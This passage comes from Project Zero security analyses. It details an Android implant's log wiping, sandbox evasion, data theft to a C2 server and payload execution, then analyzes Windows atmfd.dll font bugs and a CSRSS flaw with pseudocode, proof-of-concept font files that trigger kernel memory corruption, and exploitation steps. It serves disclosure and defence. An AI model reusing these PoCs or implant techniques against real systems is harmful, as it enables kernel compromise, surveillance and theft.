Pointer to the user-agent string

PPR

Selinux status such as “selinux-init-read-fail” or “selinux-no-mdm”

PPMM

Set if there is no “persist.security.mdm.policy” string in /init

PPQQ

Set if the “persist.security.mdm.policy” string is in /init

Error Handling & Logging

The binary has a very detailed and mature logging mechanism. It tracks both “error” and “informational” logging messages. These messages are saved until they’re sent to the C2 server either when stage 3 is automatically reaching out to the C2 server, or “on-demand” by calling the subroutine that is saved as environment variable “def”. The subroutine saved as environment variable “def2”, adds messages to the error and/or informational message queues. There are hundreds of different logging messages throughout the binary. I have documented the meaning of some of the different logging codes here.

Clean-Up

This code is very diligent with trying to clean up its tracks, both while it's running and once it finishes. While it’s running, the binary forks a new process which runs code that is responsible for cleaning up logs while the other code is executing. This other process does the following to clean up stage 3’s tracks:

  • Connect to the socket /dev/socket/logd and clear all logs
  • Execute klogctl(5,0,0) which is SYSLOG_ACTION_CLEAR and clears the ring buffer
  • Unlink all of the files in the following directories:
  • /data/tombstones
  • /data/misc/audit
  • /data/system/dropbox
  • /data/anr
  • /data/log
  • Unlinks the file /cache/recovery/last_avc_msg_recovery

There are also a couple of different functions that clean up all potential dropped files from both this stage and other stages and remove the set environment variables.

Communications with C2 Server

The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters. It then calls getaddrinfo on this random hostname. It’s trying to find a host that will cause getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will attempt 3 different addresses before it will bail if none of them return EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames and so the code is trying to detect this type of malware analysis environment.

Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted block in argument 1 at offset 0x14C7. In this binary that is 8.8.8.8:53, the Google DNS server. The code will connect to the DNS server via a socket and then send a Type A query for the randomly generated host name and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”.  If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 Server.

Handshake with the C2 Server

The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server.  Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging  (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods for collecting this data. The most common is to read system properties. They have 2 different ways to read system properties:

  • Call __system_property_get by doing dlopen(/system/lib/libc.so) and dlsym('__system_property_get').
  • Executing getprop in popen

To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the code for the function. Basically, the code is the number that the function is listed in the AIDL file. This means it can change with each new Android release. The developers of this binary hardcoded the service code for each android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK version 8-20, the code is 5 for SDK version 21, and the code is 7 for SDK versions 22-29.

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid

Logging Information

As described in the Error Processing section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they are documenting a condition that is less severe than an error. These are distinctions that the developers included in their coding.

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It’s calculated by calculating the crc32 value for the 0x10 bytes at offset 0x1CD8 in the decrypted data block and then adding the “identification code”.

struct compressedMessage {

    uint compressedDataLength;

    uint uncompressedDataLength;

    uint messageCode;

    BYTE * dataPointer;

    BYTE[4096] data;

};

Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1

 User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3

Host: REDACTED:443

Connection: keep-alive

Content-Type:application/octet-stream

Content-Length:%u

Cookie: %s

The “Cookie” field is two values from the decrypted data block: sid and uid. The values for these two keys are base64 encoded values from the decrypted data block.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system or a shared library ELF file which can be executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.

If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands which it’ll “process”.  The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section. It’s an identification code + the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts them from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then be executed.

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Write the buffer of the response to a file with the name from step #2 + “abc” concatenated to the end: /mnt/XXXXXXabc
  4. Write a specific value from memory to the file with the name from step #2 with “xyz” concatenated to the end: /mnt/XXXXXXxyz. This specific value can be changed through the 2nd function that is exported by the stage 3 binary: d.

func2 - Fork child process and inject code using ptrace.

This function forks a new process where the child will call the function init from an ELF library, then the parent will inject the code from the response into the child process using ptrace. The ELF library that is opened with dlopen and then init is called on is named /system/bin/%016lx%016lx with both values being the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function will write the buffer to either the provided file path in the third argument or it will generate a new file path.  If it’s generating a new temporary file name, the code will go down the following list of directory names beginning with /cache in the first directory that it can stat, it will create the temporary file using mkstemp(“%s/XXXXXX”).

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in in the fifth argument.

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked and that child process executes by calling execve on the file.
  • 0x2713: The response is an ELF file.  The file is written to a temporary file on the device using func3. A child process is forked and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/[email protected]@boot.oat), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath, if it doesn’t exist delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/[email protected]@boot.oat), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.

Conclusion

That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used all publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploit for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.

In-the-Wild Series: Windows Exploits

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mateusz Jurczyk and Sergei Glazunov, Project Zero

In this post we'll discuss the exploits for vulnerabilities in Windows that have been used by the attacker to escape the Chrome renderer sandbox.

1. Font vulnerabilities on Windows ≤ 8.1 (CVE-2020-0938, CVE-2020-1020)

Background

The Windows GDI interface supports an old format of fonts called Type 1, which was designed by Adobe around 1985 and was popular mostly in the 1990s and early 2000s. On Windows, these fonts are represented by a pair of .PFM (Printer Font Metric) and .PFB (Printer Font Binary) files, with the PFB being a mixture of a textual PostScript syntax and binary-encoded CharString instructions describing the shapes of glyphs. GDI also supports a little-known extension of Type 1 fonts called "Multiple Master Fonts", a feature that was never very popular, but adds significant complexity to the text rasterization logic and was historically a source of many software bugs (e.g. one in the blend operator).

On Windows 8.1 and earlier versions, the parsing of these fonts takes place in a kernel driver called atmfd.dll (accessible through win32k.sys graphical syscalls), and thus it is an attack surface that may be exploited for privilege escalation. On Windows 10, the code was moved to a restricted fontdrvhost.exe user-mode process and is a significantly less attractive target. This is why the exploit found in the wild had a separate sandbox escape path dedicated to Windows 10 (see section 2. "CVE-2020-1027"). Oddly enough, the font exploit had explicit support for Windows 8 and 8.1, even though these platforms offer the win32k disable policy that Chrome uses, so the affected code shouldn't be reachable from the renderer processes. The reason for this is not clear, and possible explanations include the same privesc exploit being used in attacks against different client software (not limited to Chrome), or it being developed before the win32k lockdown was enabled in Chrome by default (pre-2015).

Nevertheless, the following analysis is based on Windows 8.1 64-bit with the March 2020 patch, the latest affected version at the time of the exploit discovery.

Font bug #1

The first vulnerability was present in the processing of the /VToHOrigin PostScript object. I suspect that this object had only been defined in one of the early drafts of the Multiple Master extension, as it is very poorly documented today and hard to find any official information on. The "VToHOrigin" keyword handler function is found at offset 0x220B0 of atmfd.dll, and based on the fontdrvhost.exe public symbols, we know that its name is ParseBlendVToHOrigin. To understand the bug, let's have a look at the following pseudo code of the routine, with irrelevant parts edited out for clarity:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[2];

  Fixed16_16 values[2];

  for (int i = 0; i < g_font->numMasters; i++) {

    ptrs[i] = &g_font->SomeArray[arg->SomeField + i];

  }

  for (int i = 0; i < 2; i++) {

    int values_read = GetOpenFixedArray(values, g_font->numMasters);

    if (values_read != g_font->numMasters) {

      return -8;

    }

    for (int num = 0; num < g_font->numMasters; num++) {

      ptrs[num][i] = values[num];

    }

  }

  return 0;

}

In summary, the function initializes numMasters pointers on the stack, then reads the same-sized array of fixed point values from the input stream, and writes each of them to the corresponding pointer. The root cause of the problem was that numMasters might be set to any value between 0–16, but both the ptrs and values arrays were only 2 items long. This meant that with 3 or more masters specified in the font, accesses to ptrs[2] and values[2] and larger indexes corrupted memory on the stack. On the x64 build that I analyzed, the stack frame of the function was laid out as follows:

...

RSP + 0x30

ptrs[0]

RSP + 0x38

ptrs[1]

RSP + 0x40

saved RDI

RSP + 0x48

return address

RSP + 0x50

values[0 .. 1]

RSP + 0x58

saved RBX

RSP + 0x60

saved RSI

...

The green rows indicate the user-controlled local arrays, and the red ones mark internal control flow data that could be corrupted. Interestingly, the two arrays were separated by the saved RDI register and the return address, which was likely caused by a compiler optimization and the short length of values. A direct overflow of the return address is not very useful here, as it is always overwritten with a non-executable address. However, if we ignore it for now and continue with the stack corruption, the next pointer at ptrs[4] overlaps with controlled data in values[0] and values[1], and the code uses it to write the values[4] integer there. This is a classic write-what-where condition in the kernel.

After the first controlled write of a 32-bit value, the next iteration of the loop tries to write values[5] to an address made of ((values[3]<<32)|values[2]). This second write-what-where is what gives the attacker a way to safely escape the function. At this point, the return address is inevitably corrupted, and the only way to exit without crashing the kernel is through an access to invalid ring-3 memory. Such an exception is intercepted by a generic catch-all handler active throughout the font parsing performed by atmfd, and it safely returns execution back to the user-mode caller. This makes the vulnerability very reliable in exploitation, as the write-what-where primitive is quickly followed by a clean exit, without any undesired side effects taking place in between.

A proof-of-concept test case is easily crafted by taking any existing Type 1 font, and recompiling it (e.g. with the detype1 + type1 utilities as part of AFDKO) to add two extra objects to the .PFB file. A minimal sample in textual form is shown below:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/WeightVector [0 0 0 0 0] def

/Private begin

/Blend begin

/VToHOrigin[[16705.25490 -0.00001 0 0 16962.25882]]

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

The first highlighted line sets numMasters to 5, and the second one triggers a write of 0x42424242 (represented as 16962.25882) to 0xffffffff41414141 (16705.25490 and -0.00001). A crash can be reproduced by making sure that the PFB and PFM files are in the same directory, and opening the PFM file in the default Windows Font Viewer program. You should then be able to observe the following bugcheck in the kernel debugger:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000001, value 0 = read operation, 1 = write operation.

Arg3: fffff96000a86144, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd000415eefa0 -- (.trap 0xffffd000415eefa0)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000042424242 rbx=0000000000000000 rcx=ffffffff41414141

rdx=0000000000000005 rsi=0000000000000000 rdi=0000000000000000

rip=fffff96000a86144 rsp=ffffd000415ef130 rbp=0000000000000000

 r8=0000000000000000  r9=000000000000000e r10=0000000000000000

r11=00000000fffffffb r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei pl nz na po cy

ATMFD+0x22144:

fffff96000a86144 890499          mov     dword ptr [rcx+rbx*4],eax ds:ffffffff41414141=????????

Resetting default scope

Font bug #2

The second issue was found in the processing of the /BlendDesignPositions object, which is defined in the Adobe Font Metrics File Format Specification document from 1998. Its handler is located at offset 0x21608 of atmfd.dll, and again using the fontdrvhost.exe symbols, we can learn that its internal name is SetBlendDesignPositions. Let's analyze the C-like pseudo code:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  SetNumMasters(num_master);

  for (int i = 0; i < num_master; i++) {

    procs->BlendDesignPositions(i, &values[i]);

  }

  return 0;

}

The bug was simple. In the first for() loop, there was no upper bound enforced on the number of iterations, so one could read data into the arrays at &values[0], &values[1], ..., and then out-of-bounds at &values[16], &values[17] and so on. Most importantly, the GetOpenFixedArray function may read between 0 and 15 fixed point 32-bit values depending on the input file, so one could choose to write little or no data at specific offsets. This created a powerful non-continuous stack corruption primitive, which made it possible to easily redirect execution to a specific address or build a ROP chain directly on the stack. For example, the SetBlendDesignPositions function itself was compiled with a /GS cookie, but it was possible to overwrite another return address higher up the call chain to hijack the control flow.

To trigger the bug, it is sufficient to load a Type 1 font that includes a specially crafted /BlendDesignPositions object:

~%!PS-AdobeFont-1.0: Test 001.001

dict begin

/FontInfo begin

/FullName (Test) def

end

/FontType 1 def

/FontMatrix [0.001 0 0 0.001 0 0] def

/BlendDesignPositions [[][][][][][][][][][][][][][][][][][][][][][][0 0 0 0 16705.25490 -0.00001]]

/Private begin

/Blend begin

/end

end

currentdict end

%currentfile eexec /Private begin

/CharStrings 1 begin

/.notdef ## -| { endchar } |-

end

end

mark %currentfile closefile

cleartomark

In the highlighted line, we first specify 22 empty arrays that don't corrupt any memory and only shift the index up to &values[22]. Then, we write the 32-bit values of 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x41414141, 0xfffffff to values[22][0..5]. On a vulnerable Windows 8.1, this coincides with the position of an unprotected return address higher on the stack. When such a font is loaded through GDI, the following kernel bugcheck is generated:

PAGE_FAULT_IN_NONPAGED_AREA (50)

Invalid system memory was referenced.  This cannot be protected by try-except.

Typically the address is just plain bad or it is pointing at freed memory.

Arguments:

Arg1: ffffffff41414141, memory referenced.

Arg2: 0000000000000008, value 0 = read operation, 1 = write operation.

Arg3: ffffffff41414141, If non-zero, the instruction address which referenced the bad memory

        address.

Arg4: 0000000000000002, (reserved)

[...]

TRAP_FRAME:  ffffd0003e7ca140 -- (.trap 0xffffd0003e7ca140)

NOTE: The trap frame does not contain all registers.

Some register values may be zeroed or incorrect.

rax=0000000000000000 rbx=0000000000000000 rcx=aae4a99ec7250000

rdx=0000000000000027 rsi=0000000000000000 rdi=0000000000000000

rip=ffffffff41414141 rsp=ffffd0003e7ca2d0 rbp=0000000000000002

 r8=0000000000000618  r9=0000000000000024 r10=fffff90000002000

r11=ffffd0003e7ca270 r12=0000000000000000 r13=0000000000000000

r14=0000000000000000 r15=0000000000000000

iopl=0         nv up ei ng nz na po nc

ffffffff`41414141 ??              ???

Resetting default scope

Exploitation

According to our analysis, the font exploit supported the following Windows versions:

  • Windows 8.1 (NT 6.3)
  • Windows 8 (NT 6.2)
  • Windows 7 (NT 6.1)
  • Windows Vista (NT 6.0)

When run on systems up to and including Windows 8, the exploit started off by triggering the write-what-where condition (bug #1) twice, to set up a minimalistic 8-byte bootstrap code at a fixed address around 0xfffff90000000000. This location corresponds to the win32k.sys session space, and is mapped as RWX in these old versions of Windows, which means that KASLR didn't have to be bypassed as part of the attack. As the next step, the exploit used bug #2 to redirect execution to the first stage payload. Each of these actions was performed through a single NtGdiAddRemoteFontToDC system call, which can conveniently load Type 1 fonts from memory (as previously discussed here), and was enough to reach both vulnerabilities. In total, the privilege escalation process took only three syscalls.

Things get more complicated on Windows 8.1, where the session space is no longer executable:

0: kd> !pte fffff90000000000

PXE at FFFFF6FB7DBEDF90          

contains 0000000115879863    

pfn 115879    ---DA--KWEV    

PPE at FFFFF6FB7DBF2000

contains 0000000115878863

pfn 115878    ---DA--KWEV

PDE at FFFFF6FB7E400000

contains 0000000115877863

pfn 115877    ---DA--KWEV

PTE at FFFFF6FC80000000

contains 8000000115976863

pfn 115976    ---DA--KW-V

As a result, the memory cannot be used so trivially as a staging area for the controlled kernel-mode code, but with a write-what-where primitive, there are many ways to work around it. In this specific exploit, the author switched from the session space to another page with a constant address – the shared user data region at 0xfffff78000000000. Notably, that page is not executable by default either, but thanks to the fixed location of page tables in Windows 8.1, it can be made executable with a single 32-bit write of value 0x0 to address 0xfffff6fbc0000004, which stores the relevant page table entry. This is what the exploit did – it disabled the NX bit in PTE, then wrote a 192-byte payload to the shared user page and executed it. This code path also performed some extra clean up, first by restoring the NX bit and then erasing traces of the attack from memory.

Once kernel execution reached the initial shellcode, a series of intermediary steps followed, each of them unpacking and jumping to a next, longer stage. Some code was encoded in the /FontMatrix PostScript object, some in the /FontBBox object, and even more directly in the font stream data. At this point, the exploit resolved the addresses of several exported symbols in ntoskrnl.exe, allocated RWX memory with a ExAllocatePoolWithTag(NonPagedPool) call, copied the final payload from the user-mode address space, and executed it. This is where we'll conclude our analysis, as the mechanics of the ring-0 shellcode are beyond the scope of this post.

The fixes

We reported the issues to Microsoft on March 17. Initially, they were subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. A security advisory was published by Microsoft on March 23, urging users to apply workarounds such as disabling the atmfd.dll font driver to mitigate the vulnerabilities. The fixes came out on April 14 as part of that month's Patch Tuesday, 28 days after our report.

Since both bugs were simple in nature, their fixes were equally simple too. In the ParseBlendVToHOrigin function, both ptrs and values arrays were extended to 16 entries, and an extra sanity check was added to ensure that numMasters wouldn't exceed 16:

int ParseBlendVToHOrigin(void *arg) {

  Fixed16_16 *ptrs[16];

  Fixed16_16 values[16];

  if (g_font->numMasters > 0x10) {

    return -4;

  }

  [...]

}

In the SetBlendDesignPositions function, an extra bounds check was introduced to limit the number of loop iterations to 16:

int SetBlendDesignPositions(void *arg) {

  int num_master;

  Fixed16_16 values[16][15];

  for (num_master = 0; ; num_master++) {

    if (GetToken() != TOKEN_OPEN) {

      break;

    }

    if (num_master >= 16) {

      return -4;

    }

    int values_read = GetOpenFixedArray(&values[num_master], 15);

    SetNumAxes(values_read);

  }

  [...]

}

2. CSRSS issue on Windows 10 (CVE-2020-1027)

Background

The Client/Server Runtime Subsystem, or csrss.exe, is the user-mode part of the Win32 subsystem. Before Windows NT 4.0, CSRSS was in charge of the entire graphical user interface; nowadays, it implements tasks related to, for example, process and thread management.

csrss.exe is a user-mode process that runs with SYSTEM privileges. By default, every Win32 application opens a connection to CSRSS at startup. A significant number of API functions in Windows rely on the existence of the connection, so even the most restrictive application sandboxes, including the Chromium sandbox, can’t lock it down without causing stability problems. This makes CSRSS an appealing vector for privilege escalation attacks.

The communication with the subsystem server is performed via the ALPC mechanism, and the OS provides the high-level CSR API on top of it. The primary API function is called ntdll!CsrClientCallServer. It invokes a selected CSRSS routine and (optionally) receives the result:

NTSTATUS CsrClientCallServer(

    PCSR_API_MSG ApiMessage, 

    PVOID CaptureBuffer, 

    ULONG ApiNumber, 

    LONG DataLength);

The ApiNumber parameter determines which routine will be executed. ApiMessage is a pointer to a corresponding message object of size DataLength, and CaptureBuffer is a pointer to a buffer in a special shared memory region created during the connection initialization. CSRSS employs shared memory to transfer large and/or dynamically-sized structures, such as strings. ApiMessage can contain pointers to objects inside CaptureBuffer, and the API takes care of translating the pointers between the client and server virtual address spaces.

The reader can refer to this series of posts for a detailed description of the CSRSS internals.

One of CSRSS modules, sxssrv.dll, implements the support for side-by-side assemblies. Side-by-side assembly (SxS) technology is a standard for executable files that is primarily aimed at alleviating problems, such as version conflicts, arising from the use of dynamic-link libraries. In SxS, Windows stores multiple versions of a DLL and loads them on demand. An application can include a side-by-side manifest, i.e. a special XML document, to specify its exact dependencies. An example of an application manifest is provided below:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">

  <assemblyIdentity type="win32" name="Microsoft.Windows.MySampleApp"

      version="1.0.0.0" processorArchitecture="x86"/>

  <dependency>

    <dependentAssembly>

      <assemblyIdentity type="win32" name="Microsoft.Tools.MyPrivateDll"

          version="2.5.0.0" processorArchitecture="x86"/>

    </dependentAssembly>

  </dependency>

</assembly>

The bug

The vulnerability in question has been discovered in the routine sxssrv! BaseSrvSxsCreateActivationContext, which has the API number 0x10017. The function parses an application manifest and all its (potentially transitive) dependencies into a binary data structure called an activation context, and the current activation context determines the objects and libraries that need to be redirected to a specific implementation.

The relevant ApiMessage object contains several UNICODE_STRING parameters, such as the application name and assembly store path. UNICODE_STRING is a well-known mutable string structure with a separate field to keep the capacity (MaximumLength) of the backing store:

typedef struct _UNICODE_STRING {

  USHORT Length;

  USHORT MaximumLength;

  PWSTR  Buffer;

} UNICODE_STRING, *PUNICODE_STRING;

BaseSrvSxsCreateActivationContext starts with validating the string parameters:

for (i = 0; i < 6; ++i) {

  if (StringField = StringFields[i]) {

    Length = StringField->Length;

    if (Length && !StringField->Buffer ||

        Length > StringField->MaximumLength || Length & 1)

      return 0xC000000D;

    if (StringField->Buffer) {

      if (!CsrValidateMessageBuffer(ApiMessage, &StringField->Buffer,

                                    Length + 2, 1)) {

        DbgPrintEx(0x33, 0,

                   "SXS: Validation of message buffer 0x%lx failed.\n"

                   " Message:%p\n"

                   " String %p{Length:0x%x, MaximumLength:0x%x, Buffer:%p}\n",

                   i, ApiMessage, StringField, StringField->Length,

                   StringField->MaximumLength, StringField->Buffer);

        return 0xC000000D;

      }

      CharCount = StringField->Length >> 1;

      if (StringField->Buffer[CharCount] &&

          StringField->Buffer[CharCount - 1])

        return 0xC000000D;

    }

  }

}

CsrValidateMessageBuffer is declared as follows:

BOOLEAN CsrValidateMessageBuffer(

    PCSR_API_MSG ApiMessage,

    PVOID* Buffer,

    ULONG ElementCount,

    ULONG ElementSize);

This function verifies that 1) the *Buffer pointer references data inside the associated capture buffer, 2) the expression *Buffer + ElementCount * ElementSize doesn’t cause an integer overflow, and 3) it doesn’t go past the end of the capture buffer.

As the reader can see, the buffer size for the validation is calculated based on the Length field rather than MaximumLength. This would be safe if the strings were only used as input parameters. Unfortunately, the string at offset 0x120 from the beginning of ApiMessage (we’ll be calling it ApplicationName) can also be re-used as an output parameter. The affected call stack looks as follows:

sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity

sxs!CNodeFactory::CreateNode

sxs!XMLParser::Run

sxs!SxspIncorporateAssembly

sxs!SxspCloseManifestGraph

sxs!SxsGenerateActivationContext

sxssrv!BaseSrvSxsCreateActivationContextFromStructEx

sxssrv!BaseSrvSxsCreateActivationContext

When BaseSrvSxsCreateActivationContextFromStructEx is called, it initializes an instance of the SXS_GENERATE_ACTIVATION_CONTEXT_PARAMETERS structure with the pointer to ApplicationName’s buffer and the unaudited MaximumLength value as the buffer size:

BufferCapacity = CreateCtxParams->ApplicationName.MaximumLength;

if (BufferCapacity) {

  GenActCtxParams.ApplicationNameCapacity = BufferCapacity >> 1;

  GenActCtxParams.ApplicationNameBuffer =

      CreateCtxParams->ApplicationName.Buffer;

} else {

  GenActCtxParams.ApplicationNameCapacity = 60;

  StringBuffer = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 0, 120);

  if (!StringBuffer) {

    Status = 0xC0000017;

    goto error;

  }

  GenActCtxParams.ApplicationNameBuffer = StringBuffer;

}

Then sxs!SxsGenerateActivationContext passes those values to ACTCTXGENCTX:

Context = (_ACTCTXGENCTX *)HeapAlloc(g_hHeap, 0, 0x10D8);

if (Context) {

